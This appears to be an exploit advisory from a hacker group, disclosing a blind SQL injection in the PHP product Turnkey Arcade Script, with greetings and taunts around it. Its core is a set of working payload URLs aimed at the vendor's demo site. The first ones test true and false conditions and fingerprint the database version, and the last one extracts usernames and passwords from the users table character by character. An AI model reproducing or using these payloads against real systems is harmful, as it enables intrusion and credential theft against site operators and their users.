[?] ~ Note : sEc-r1z CrEw# r0x ! ========== [?] Turnkey Arcade Script Blind SQL Injection Vulnerability ========== [?] My home: [ http://sec-r1z.com ] [?] For Ask: [r-d@passport.com] [?] Script: [ Turnkey Arcade Script ] [?] Language: [ PHP ] [?] Founder: [ Red-D3v1L ] [?] Gr44tz to: [ sec-r1z# Crew - Hackteach Team - My L0ve ~A~ ] [?] n00bz : [Zombie_KSA g0t 0wn3d hehehe n00b pakbugs zf0 ..] ########### ===[ Exploit SQL Blind ]=== [&#187;]Exploit : http://www.turnkeyarcade.com/demo/index.php?action=browse&id=7%20and%201=1 << this true http://www.turnkeyarcade.com/demo/index.php?action=browse&id=7%20and%201=0 << this faulse http://www.turnkeyarcade.com/demo/index.php?action=browse&id=7%20and%20substring%28@@version,1,1%29=4 << this true http://www.turnkeyarcade.com/demo/index.php?action=browse&id=7%20and%20substring%28@@version,1,1%29=5 << this faulse http://www.turnkeyarcade.com/demo/index.php?action=browse&id=7%20and%20%28select%20substring%28concat%281,concat%28username,0x3a,password%29%29,1,1%29%20from%20users%20%20limit%200,1%29=1 ./Greetz For All my Frindes ========== #sEc-r1z.com Str1kEz y0u !